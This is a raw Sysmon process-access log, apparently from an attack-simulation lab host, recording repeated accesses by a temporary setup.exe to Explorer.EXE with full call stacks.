13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000016069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000016064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000016060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000016057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+